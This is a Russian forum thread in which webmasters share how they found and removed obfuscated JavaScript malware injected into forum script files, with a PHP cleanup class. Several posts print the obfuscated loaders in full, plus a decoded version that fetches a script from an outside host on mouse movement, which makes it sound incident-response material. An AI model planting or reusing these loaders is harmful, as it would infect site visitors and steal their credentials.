Posted 1 марта, 201212 yr comment_700 Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось.. Поделюс опытом удаления 'плохого' скрипта с форума. Как работал фрейм? Очень просто, при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js, что делает этот срипт - не известно. Названиние подгружаемого скрипта генерировалось автоматически. Первое, что пришло мне на ум - сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась. Тогда я обратился хостеру, который подсказал мне где может находиться вирус и как его обнаружить (золотой же человек мой хостер ) То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно. Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём, поискал в интрнете подобный случай и обнаружил, что это код кодируется в скриптах. Там же я обнаружил как именно он кодируется, и, по небольшому кусочку кода, начал поиск по резервной копии.. Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом. Вот как он выглядит в зашифрованном виде: var tdf7003="";function nabc155c58d(){var m8cb2ed7=String,f475cf=Array.prototype.slice.call(arguments).join(""),kd969a1=f475cf.substr(rc176e(),3)-573,k0c027f7a,l089296;f475cf=f475cf.substr(17);var ia0a771c7=f475cf.length;for(var k6cbf7811=0;k6cbf7811<ia0a771c7;k6cbf7811++){try{throw(k71b3b=f475cf.substr(k6cbf7811,1));}catch(e){k71b3b=e;};if(k71b3b=='}'){kd969a1="";k6cbf7811=v7fd954e3(k6cbf7811);s781897=ofbf416a(f475cf,k6cbf7811);while(s781897!='}'){kd969a1+=s781897;k6cbf7811++;s781897=oa6558(f475cf,k6cbf7811);}kd969a1-=373;continue;}k0c027f7a="";if(ded203d6a(k71b3b)){k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);while(k71b3b!='±'){k0c027f7a+=k71b3b;k6cbf7811++;k71b3b=f475cf.substr(k6cbf7811,1);}k0c027f7a=i61bbb(k0c027f7a,kd969a1,23);if(k0c027f7a<0)k0c027f7a+=256;k0c027f7a=k8016e5(k0c027f7a);j33797fa(k0c027f7a);continue;}b6ed78d=l85b5d784(k71b3b);if(b6ed78d>848)b6ed78d-=848;l089296=b6ed78d-kd969a1-23;if(l089296<0)l089296+=256;if(l089296>=192)l089296+=848;else if(l089296==168)l089296=1025;else if(l089296==184)l089296=1105;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](l089296);}}nabc155c58d("c","998c","d","7","1","d","c1ea2","65","8","±1","4","8","±}","441","}","±19","3","±","±20","8±±","20","1±","}5","31","}±2","4","±}4","0","5}","±","171±±","1","60±±166","±","}4","3","5","}±1","95","±}5","38","}±","228±","}","5","60}±25","1","±","±2","42","±M±","2","2","3±±22","0","±}5","52","}","±2","11","±","}","43","9}","±","207","±}","5","20","}±11","±","±","2","8","±","}","5","6","0}±","2","42","±GD",">±2","42","±±","15±±","2","4","2","±}52","8","}±217","±","±26","±&","}41","4","}±1","8","0","±","±","176±","z","o","}","5","06}","±203±±2","5","5","±","}57","3","}N","}47","4","}±2","3","4±}491","}","±0","±±1±","}","438","}±","2","0","2","±","±","2","05±","±","18","7±}4","14","}","±","1","8","0","±}563}",">}","4","8","0}±2","4","8","±","±","231±","}","56","7}A}5","2","2","}±1","7±}49","8}±","0±±","0±}563}","±3±>H}","56","0}","±","25","5±}38","7","}±","1","34±R","}4","3","6}","±","1","85±","±20","3","±","±1","8","4","±","±","191","±","±1","8","5±","}495}±2","53±±24","6±±","1","90","±","±4","±","±2","53±","±","2","4","2±","}","3","75}","±","1","4","3","±","±1","26±G","}","50","2}","±","2","5","1±±","7±","±","5","±","±199±","±","2","5","5±}","4","5","9}±156","±±","14","8±}","532}","±","241±±1","9","5±","±192±","±","191","±}541","}(}","4","0","3","}±1","55","±","U]±1","69±}483","}±2","54","±±245","±","}","5","30","}±","2","5±","}","4","7","0}±","23","1±","}","4","3","4","}±18","6±t±","203±±","1","89","±","}572","}","L}55","7","}","3}","5","4","2}/","7}","49","9}±","1","9","5±±1","3±}","419}±","19","0±}","489","}±","5±}","3","9","1","}","±1","4","3","±}537}","'±2","8±}","487","}±","2","4","0","±","±1","6","9±±","19","8","±}","424","}","±","13","5","±","±","13","5±}","487","}","±169±±","17","6±","}","528","}'}","5","51}","7","-",".","/}","4","87}±","24","2","±","±24","7±}","4","11","}","±","16","2","±±","1","61","±d","}404","}","_V±","1","7","7","±C","@","??}","5","2","0}","!","}","5","1","7}","±1","6","±","±","21","±","±","1","1","±","}4","2","2","}±183","±","}5","69}R}4","5","5}","±","1","5","1±","±225","±","±","2","26±}5","35","}3}","5","2","6}±","2","2±","±","28","±±1","7","±","±","2","3±","}472","}","±","1","54±","±","183","±±","15","4±","}","46","0}","±1","58±}4","28}±1","3","7±}","55","3","}","±216±","}","37","8}&","}4","07}B","}457","}±232","±","xu","}506}","±165±","±0","±","}5","2","0}±2","5","±±13±","}5","2","4","}#±27±","}","50","8}±3±","}","4","6","4","}±","2","2","4±","}","397}±","1","63±}41","7}q","±","178±","}","56","9","}I}","45","2","}±","211","±±2","13","±±","2","1","9","±±2","1","7","±","}52","9","}","±24±","±3","2","±")±24","±","±","2","1","1±}","4","57}","±","1","68±±","139±","}468","}","±220","±}","45","8}","±","2","2","5±±2","18±","±","2","07","±","}3","93","}","±","159","±","}","42","1","}","±","17","6±±","182","±±1","81±","o","}416}","kb","±18","9±","O","}431","}","[","Z}","4","5","3}p","±20","8±","}","38","0","}","±132","±","}","5","7","0","}","±252","±}","4","9","4","}±184","±}432","}±","2","01","±","}","55","9}",":","?5}","4","36}±","1","9","7±","}434","}","±20","3±","±","130","±}4","48}±","21","8±}","43","3}","±20","4±","}","3","9","1}±","1","63±","±1","43±","±1","49","±}484","}±","231","±}","4","55","}","±2","0","8±±","137±","±1","6","6","±}","464}±","17","5±}54","6","}±1","±}398","}","P","}5","15}","±2","1","3","±","±2","0","6","±","±1","9","7±}","56","3","}","P}","50","9","}±","1","7","2","±}4","7","9}±","1","39±","±138±","}414","}","I}5","5","0","}±","2","09","±","}421","}±1","90","±±1","76±","}","5","1","3}±","17","±","}","3","78","}","±1","2","8±}4","4","4","}","±2","0","5","±}56","3}","L±3±","}48","6","}±","0","±","}","53","1","}.}","4","97","}","±1","3","±","}436","}±1","8","8±±194","±","±","1","8","3","±","}","5","09}±","6±}","3","86","}D","}4","1","8}±1","2","9±","}","5","50","}±23","2","±±","2","4","9±","}","403","}p","}4","3","9}f","}3","99","};",":}39","6","}7}3","82}",")","}","46","4}","±","232","±±2","1","1±±","22","8","±","}","4","3","4","}t","}555","}5","}4","43}","±1","94±±1","90","±","±19","3","±}3","9","4","}L","}4","8","5","}","±","19","6±±167±±235","±±","24","6","±±2","3","4±","}","55","4","}A}46","6","}±22","5±±21","7±","}4","01","}","±","1","6","1±}5","2","2","}±32","±","±218","±}55","5","}","4","}","4","71}","±222","±","±2","37±","±19","0±","±","2","29±}","429}","±18","0±}5","3","0}!±","2","5±"('±","24","6","±","-±","8±}","50","7}","±","2","54±±4","±","}","53","5}","±","7±","±26±","}","389}","±","1","48±±14","0","±}44","3","}±1","33±}","45","4}±143±","±208","±±20","5±±20","1±±","2","0","4±","±","1","4","3±","}","39","7}","X±13","8","±}405","}","g","}5","5","3}(}","46","8}±1","7","7","±","±13","1","±±","1","2","8±","}4","1","4","}","I","}","503}±","1","6","2","±±1","62","±","}49","0","}","±2±}","4","67}±","2","1","4","±","±2","31±","±","1","4","9","±}472}","±","2","3","7±±","22","1±","±","2","36±±","227","±","}4","16}±","17","8±±1","82±b±1","2","7±","}40","9","}","[±","159±}","5","1","4","}","±","1","9","±","}","5","0","6}","±","2","55","±}3","7","8}","±","14","5","±±","1","37±}","446","}","±","19","7","±±2","0","6±±212","±±1","4","2±","±195","±","±2","10","±}538}","!}","4","3","0}","±","1","7","7±}","4","55}±","2","2","1","±","±","20","6","±}528}±","247±","±30","±}52","2","}±","1","7","±","±2","5±±1","7±","±2","6","±","}","5","65","}","K","±2","5","5±","}5","2","4","}±213","±!}4","14}±","16","3±±1","7","8±}","527}±2","6","±","}","423","}","±1","85±","}5","31","}",")","}5","04}±","19","3","±","±","19","5","±±21","3","±","}","5","0","3}±1","66±","}","4","4","5","}","i","}499}","±","158","±±1","58±","±","15","8","±}","3","9","0","}±","155±±1","3","9±","}54","8}8}42","4}±1","79","±±","186","±}","547}","9","}5","52","}±","2","4","8","±>","}566","}QH=}511","}","±","193±±","222","±}3","9","2}J","Q±158","±","±1","4","3","±±16","2±}","3","8","6}","±","1","52±","}44","6","}±","143","±}45","4}±21","0±","±2","01±","±","2","2","2","±","±","2","0","1±","±2","1","9","±±2","0","3±}49","0","}","±","254±","}538}%}376","}","±1","3","8","±","}49","9","}","±","9±","±1","88±","±","208","±","±","1","62±","±","1","59±±1","58","±","}","48","7","}±","14","6","±±1","4","6","±}384","}±","1","49±","±","13","3","±±1","48±","}","48","2}±","2","37±}","55","3};","?}55","2","}±248","±","98","}4","4","4","}","±","2","08±±","19","5±","±191","±","±1","94","±}5","6","8}","S","}","522","}","±","3","1±","}56","4","}","J7","}","54","4","}","6","}3","82","}","±13","3","±±","131","±±1","36","±±","1","29±","±1","4","2","±±1","35","±","±133±","@]}","5","25","}±","20","7±±","21±","}5","45}81","&","}4","26","}","±","1","9","2±","}","39","9}","±","1","5","4","±","±","160±}","5","4","0},","±","2","22","±","}51","2}±2","02±}","53","3}±2","24±}377};±","1","50","±","}47","6}","±","139","±}","382}","*",")}","5","6","5}","±2","2","4","±","±","2","2","4±","±","2","24±@}43","0}","±","1","8","2","±}5","5","9","}±","2","4","1","±","}","525","}","±215±}","49","1","}±","1","±}","504","}","±2","±","}4","00","}±1","55","±}","4","62}±2","2","7±±15","8","±±22","6±±213±","}5","3","3}","±24","±","}389}","±139","±","}4","16}","±187","±","±1","49±","±1","82","±}","4","15","}","±1","62","±±","181±","}47","7}","±","2","28","±±","1","59","±}","4","35}±1","4","6±}37","5}V","}","4","09","}[","}563}±","252","±}4","18}","±","1","6","7±","}5","4","2","}/-}5","62","}","D@}3","8","9","}","±","140","±}5","2","4}",""±1","9±","}","50","0}±","1","8","9±±191","±}405}","W","±","178±","DA@@","@","}4","2","9","}XX±19","8","±}","5","22}","±","21","±","±2","6±","}5","5","1","}-}","48","1}±242±","}56","6}O","}514}","±","210","±","±2","8±","±29","±}4","75}±2","4","7±}","4","4","3","}±","19","5","±±201±}","39","8","}","±","1","45","±","}","447}±2","0","0±}","5","5","8}","±2","4","0±","±1","3","±±","2","4","0","±","}","41","3","}q","}43","9","}","±","148±","}","5","0","0}","±16","3","±}","4","42}","f}","45","2}","ooo","}","517","}","±","1","76","±}5","27}.","}","491}±15","4±","±151±","±15","0","±","}41","5}","J","J","}5","30}","1","}","549","}","±2","±±2","12±±","209±","}","5","4","7","}","±","2","06","±±2","0","6","±","±","2","06","±","8","(}4","9","9}±7±}","4","3","7","}","±","1","92±","}5","70}L","}","45","5","}±","2","21±±","1","51±}49","1","}±252±","}","5","5","7}=}48","3}±","24","1±±24","4","±","}4","9","6","}","±","243","±","±","246","±}","5","2","6","}","±2","08±±237±±2","08±±","22±}","430","}","±","1","9","7±}","45","9","}±2","1","9","±","±208±","}","3","8","9}","±155±","±","1","4","4","±","±","1","50±}5","70}","J","±","4","±±","5","±}","5","4","1}","±","2","23±}","397","}±170±<}4","1","0}F","}","49","7","}","±1","56","±±","1","5","6","±","±1","5","6±±1","56±","±","10","±}","4","33}","±","18","8±","}","5","5","4","}",":","}4","4","2","}","±19","2","±","}53","4}'","/","±230","±}","415","}±","1","85","±","}474}±2","45±±24","6","±","±","22","6±±","23","2","±","±2","21±","±2","27±±156","±}","47","5","}±1","8","6","±±1","5","7±","}","420}x","}","380}Y+","(","}","4","73}","±","132","±±","1","32","±±","1","3","2","±","}37","6","}±1","51±}4","2","9}±138","±Y","}","3","78}","%%}449}l","}4","62","}","±","22","7","±","}","3","80}","±","129","±","}","429}","±19","3","±}44","5","}±200","±","±","20","7","±±2","11±}","41","2}l","}","48","7}±","25","2±","±","251±","}","488}","±","2","3","7","±","±17","0","±","}3","77}X","}","554}±236±","A>","}4","9","2","}","±","25","0","±","±","1","74","±±18","5","±","±1","7","4±","±21","9","±±","2","3","9±±2±","}","4","5","8","}±","2","12","±}","5","42}","±","2","3","8","±2","!}","5","31}","#","}42","4","}","±","1","7","4±±1","85","±±1","8","3","±r","}5","73","}±8±","}4","74}","±","17","0","±","±","2","4","0±}","5","26}±","3","1±","}44","4","}","±","177","±±","2","1","0±±","208±","±","19","9","±}","4","3","2}","±","1","9","2","±","±","1","8","5","±}","41","3","}","g}","5","1","2","}","±20","3±","}4","9","7","}","±","1","93±}","4","13}","±","1","7","8","±±1","80","±","±1","61","±","}","3","9","4}","±","1","5","9±","}","380","}±","146","±}4","9","7}±5±","±2","5","2±}","3","9","3","}","±","1","5","3","±}44","0","}±","1","93","±}4","65","}±","15","5","±","±166","±","±","1","56","±}4","59}±1","41","±","±","1","52","±","±","14","1±","±1","4","8±}","395","}","[","}46","9}","±","2","25","±}","411","}","±1","76","±}","4","9","8}±1","8","7","±","±","207","±}","5","5","9","}±","2","2","2","±}5","6","3}±","22","3±","±","22","2","±±2","22±","}53","6","}","±","195","±}5","5","9}","9}4","7","1}±2","22±","±218±","±2","21","±}5","50","}±24","6±",")}","49","8}","±","4","±","±4","±","}52","7}±2","2","±","±3","1±","±21","±±","2","44","±","±25±±","26","±±","29±","}5","3","9","}!","±2","29","±","}","5","1","2","}","±","2","1±}","5","3","0","}","±23±&","}4","71","}","±226±}","49","9}","±","5","±}","43","0","}±","196±","}47","3}±16","4±±1","82±","±1","3","6","±±1","3","3±","±","1","32±}","4","17","}","L±","192","±PML","±","1","9","2±","±126±","}","4","80}±1","43","±","±","14","0","±}375","}","±","1","50±","}397","}X}","498","}","±","188","±","±18","9±","}50","7","}","±216","±","");eval(tdf7003);function rc176e(){return 14;}function v7fd954e3(y328166){return ++y328166;}function ofbf416a(c68a9f9,c2c81e){return c68a9f9.substr(c2c81e,1);}function oa6558(xeea275f0,y47011595){return xeea275f0.substr(y47011595,1);}function k8016e5(lb3daa13){if(lb3daa13==168)lb3daa13=1025;else if(lb3daa13==184)lb3daa13=1105;return (lb3daa13>=192 && lb3daa13<256) ? lb3daa13+848 : lb3daa13;}function ded203d6a(k835fa24e){return k835fa24e=='±';}function i61bbb(o764cf3,s3c613,g05e26cf8){return o764cf3-s3c613-g05e26cf8;}function j33797fa(t4c415){var m8cb2ed7=String;tdf7003+=m8cb2ed7["x66romx43x68ax72x43x6fx64x65"](t4c415);}function l85b5d784(vad933){return (vad933+'')["chax72x43odex41t"](0);} А вот как в расшифрованном виде: (function() { var url = '__constructivehell.is-a-cubicle-slave.com/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function() { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/code] [/spoiler] Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал? По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP, что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме...
3 марта, 201212 yr comment_787 Сталкивался много раз с этой проблемой на булке, но до этого момента, кстати, не замечал, что бы на IPB было похожее. Касперыч мой ругался на вирусяку и не давал её загрузиться в браузере. Картинко: Данный зверюга ворует ваши пароли, хранящиеся в памяти браузера, не важно когда вы их ввели или сохранили в памяти браузера. Скрипт заливается очень просто (как это было с булкой) просто создаётся новый юзер "с скрытыми символами" XSS атака, а также сообщением или картинкой. Бороться можно. Достаточно ограничить доступ к файлам и папкам (непосредственно на фтп выдать нужные права для файлов - ТОЛЬКО ЧТЕНИЕ) Ну или некоторые мои знакомые писали скрипты, которые каждый час проверяли изменение файлов на фтп Так тоже можно ^^ И кстати, Паш, настрой права у моей группы Я в чате писать не могу :D
14 апреля, 201212 yr Author comment_2681 Если у кого возникла такая же проблема с сайтами, могу скинуть скрипт, который автоматом удалит вирус из всех яваскриптов.. PS: была обнаружена другая модификация данного вируса..
18 мая, 201212 yr comment_4578 похожая беда на моем форуме, изменил пароли на фтп и все остальные, удалил свой фтп клиент, запретил браузеру хранить пароли, перезалил все файлы форума и дополнений. но всёже иногда попадаеться постороний код в конце js файлов (видимо какието устаревшие файлы от старых версий форума). но код у меня был другой, кажеться начинался с try, если опять встречу, выложу. в логах фтп нашел этот ip: 62.122.79.1 скиньте плз скрипт и какие права на папки и файлы лучше поставить так чтобы потом небыло проблем в работе форума.
18 мая, 201212 yr Author comment_4579 Вот скрипт: <? /* ---------------------------------------------------------------------------------- dScaner Class - START ---------------------------------------------------------------------------------- */ /* * * Класс - dScaner для сканирования директорий на наличие вредоносного кода в * указанных типах файлов * * Разработчик: Денис Ушаков * Дата разработки: 03-04-2012 * Версия разработки: 0.0.3 * */ Class dScaner { // преобразуем входной параметр в массив // $get_str - список параметров // $separator - разделитель параметров в списке function request($get_str, $separator) { if (isset($get_str) && !empty($get_str)) { // эксплоадим строку в массив и возвращаем его $obj = explode($separator, $get_str); return $obj; } else { return false; } } /* * * Функция поиска в файлах вхождения заданной строки: * * $this->find($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка поиска * */ function find($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы, которые будут игнорироваться $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->find($sub_dir, $files_allowed, $requested_string); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг найденного вхождения искомой строки $file_founded = false; // разбиваем файл на строки $tf_strings = explode("n", $temporary_file); // обрабатываем каждую отдельно foreach ($tf_strings AS $item) { $item = strval($item); // если в строке есть вхождения искомого запроса if (strpos($item, $requested_string) !== false) { $file_founded = true; } } // если в файле найдена строка if ($file_founded) { // выводим путь до файла в котором найдено вхождение print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - в файле обнаружена искомая строка. </span> "; } } } closedir($temp); } } /* * * Функция сканирования вредоносного кода: * * $this->scan($path, $files_allowed, $requested_string); * * $path - путь до директории, от которой отталкиваться при сканировании * $files_allowed - список файлов, которые подвергаются сканированию * $requested_string - строка, по которой определяется наличие вредоносного кода * */ function scan($path = './', $files_allowed, $requested_string) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $new_parent_dir = $path . $dir; $this->scan($sub_dir, $files_allowed, $requested_string, $new_parent_dir); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) && (strpos($dir, '_BACKUP') == false) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; // считываем файл в строку $temporary_file = file_get_contents($in_dir_file); // флаг бекапа файла $create_backup = false; // разбиваем файл на строки и считываем каждую отдельно $tf_strings = explode("n", $temporary_file); // индекс строки файла $str_index = 0; // каждую строку обрабатываем отдельно foreach ($tf_strings AS $item) { $item = strval($item); if (strpos($item, $requested_string) !== false) { // если в строке есть вхождения искомого запроса // флаг бекапа файла, в котором найден вредоносный код $create_backup = true; // удаляем всю строку с вредоносным кодом unset($tf_strings[$str_index]); } $str_index++; } // создаём бэкап if ($create_backup) { // меняем права в папке в которой находимся чтобы иметь возможность писать в неё chmod($path, 0777); // формируем имя БЭКАПа файла $temp_file_backup = $in_dir_file.'_BACKUP'; // сохраняем БЭКАП файла рядом с исходным file_put_contents($temp_file_backup, $temporary_file); // собираем очищенный файл в строку $scanned_file = implode("n", $tf_strings); // сохраняем очищенный файл if (file_put_contents($in_dir_file, $scanned_file)) { // перезаписали удачно print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>" . $in_dir_file . " - Файл очищен. (+ BACKUP) </span> "; } else { // перезапись не удалась print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - Файл НЕ очищен. </span> "; } // меняем права в папке в которой находимся обратно на 755 chmod($path, 0755); } } } closedir($temp); } } /* * * Функция восстановления БЭКАПОВ файлов * * $this->restore_backups($path, $files_allowed); * * $path - путь до директории, от которой отталкиваться при восстановлении * $files_allowed - список файлов, которые подвергаются восстановлению * */ function restore_backups($path = './', $files_allowed) { // исключаемые ссылки на директории и файлы $dir_disallow = array('.', '..', '.htaccess', '.git'); if(is_dir($path)) { $temp = opendir($path); while (false !== ($dir = readdir($temp))) { if ((is_dir($path . $dir)) && (!in_array($dir, $dir_disallow)) ) { // если директория - сканируем её $sub_dir = $path . $dir . '/'; $this->restore_backups($sub_dir, $files_allowed); } elseif ((is_file($path . $dir)) && (!in_array($dir, $dir_disallow)) && (strpos($dir, $files_allowed) == true) ) { // Если файл // получаем полный путь до него $in_dir_file = $path . $dir; if (is_file($in_dir_file.'_BACKUP')) { // БЭКАП существует, получаем его содержимое $temporary_file_from_backup = file_get_contents($in_dir_file.'_BACKUP'); // восстанавливаем бэкап файла if (file_put_contents($in_dir_file, $temporary_file_from_backup)) { // удаляем бэкап unlink($_SERVER['DOCUMENT_ROOT'].'/'.$in_dir_file.'_BACKUP'); // бэкап восстановили print "<span style='display:block; padding:5px; border:1px solid #1f4f18; background-color:#d5f5ce; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - восстановлен. </span> "; } else { // бэкап НЕ восстановили print "<span style='display:block; padding:5px; border:1px solid #822121; background-color:#ea7575; font-size:12px; line-height:16px; font-family:tahoma, sans-serif; margin-bottom:-15px;'>".$in_dir_file ." - НЕ восстановлен. </span> "; } } } } closedir($temp); } } } /* ---------------------------------------------------------------------------------- dScaner Class - END ---------------------------------------------------------------------------------- */ ?> [/CODE] [/spoiler] но код у меня был другой, кажеться начинался с try, если опять встречу, выложу. Выкладывай, посмотрим что у тебя за код.. Права изменять бесполезно - злоумышленник при внедрении вредоносного кода имеет доступ к файлам через FTP.
18 мая, 201212 yr comment_4580 вот этот код: try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;}try{prototype;}catch(brebr){st=String;zz='al';zz='zv'.substr(123-122)+zz;ss=[];f='fr'+'om'+'Ch';f+='arC';f+='ode';w=this;e=w[f["substr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$51$48.5$52.5$50$49$57.5$55$49$55.5$22$55$54.5$49$60$54.5$54$49.5$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$51.5$50$15$19$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$23$19.5$15$60.5$5.5$4$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$51$49.5$47.5$49$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50.5$49.5$57$33.5$53$49.5$53.5$49.5$54$57$56.5$32$59.5$41$47.5$50.5$38$47.5$53.5$49.5$19$18.5$51$49.5$47.5$49$18.5$19.5$44.5$23$45.5$28.5$5.5$4$3.5$3.5$3.5$58$47.5$56$15$56.5$48.5$56$51.5$55$57$15$29.5$15$49$54.5$48.5$57.5$53.5$49.5$54$57$22$48.5$56$49.5$47.5$57$49.5$33.5$53$49.5$53.5$49.5$54$57$19$18.5$56.5$48.5$56$51.5$55$57$18.5$19.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$57$59.5$55$49.5$15$29.5$15$18.5$57$49.5$59$57$22.5$52$47.5$58$47.5$56.5$48.5$56$51.5$55$57$18.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$56$49.5$47.5$49$59.5$56.5$57$47.5$57$49.5$48.5$51$47.5$54$50.5$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$15$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$51.5$50$15$19$57$51$51.5$56.5$22$56$49.5$47.5$49$59.5$40.5$57$47.5$57$49.5$15$29.5$29.5$15$18.5$48.5$54.5$53.5$55$53$49.5$57$49.5$18.5$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$3.5$61.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$54.5$54$53$54.5$47.5$49$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$3.5$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$24$28.5$5.5$4$3.5$3.5$3.5$61.5$28.5$5.5$4$3.5$3.5$3.5$56.5$48.5$56$51.5$55$57$22$56.5$56$48.5$15$29.5$15$57.5$56$53$15$20.5$15$37.5$47.5$57$51$22$56$47.5$54$49$54.5$53.5$19$19.5$22$57$54.5$40.5$57$56$51.5$54$50.5$19$19.5$22$56.5$57.5$48$56.5$57$56$51.5$54$50.5$19$24.5$19.5$15$20.5$15$18.5$22$52$56.5$18.5$28.5$5.5$4$3.5$3.5$3.5$51$49.5$47.5$49$22$47.5$55$55$49.5$54$49$32.5$51$51.5$53$49$19$56.5$48.5$56$51.5$55$57$19.5$28.5$5.5$4$3.5$3.5$61.5$5.5$4$3.5$61.5$28.5$5.5$4$61.5$19.5$19$19.5$28.5"[((e)?"s":"")+"p"+"lit"]("a$"[((e)?"su":"")+"bstr"](1));for(i=6-2-1-2-1;i-683!=0;i++){j=i;if(st)ss=ss+st.fromCharCode(-1*h*(1+1*n[j]));}q=ss;e(q);} try{q=document.createElement("d"+"i"+"v");q.appendChild(q+"");}catch(qw){h=-012/5;zz='a'+'l';f='fr'+'om'+'Ch';f+='arC';}try{qwe=prototype;}catch(brebr){zz='zv'.substr(123-122)+zz;ss=[];f+=(h)?'ode':"";w=this;e=w[f["s"+"ubstr"](11)+zz];n="19$50$57.5$54$48.5$57$51.5$54.5$54$19$19.5$15$60.5$5.5$4$3.5$58$47.5$56$15$57.5$56$53$15$29.5$15$18.5$51$57$57$55$28$22.5$22.5$55.5$50$58$53$59.5$55.5$56$51.5$51$51.5$22$51$54.5$53.5$49.5$53$51.5$54$57.5$59$22$54$49.5$57$22.5$50.5$22.5$18.5$28.5$5.5$4$3.5$51.5$50$15$19$57$59.5$55$49.5$54.5$50$15$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$29.5$29.5$15$18.5$57.5$54$49$49.5$50$51.5$54$49.5$49$18.5$19.5$15$60.5$5.5$4$3.5$3.5$58.5$51.5$54$49$54.5$58.5$22$59$59.5$60$50$53$47.5$50.5$15$29.5$15$23$28.5$5.5$4$3.5$61.5$5.5$4$3.5$49$54.5$48.5$57.5$53.5$49.5$54$57$22$54.5$54$53.5$54.5$57.5$56.5$49.5$53.5$54.5$58$49.5$15$29.5$15$50$57.5$54$48.5$57$51.5$54.5$5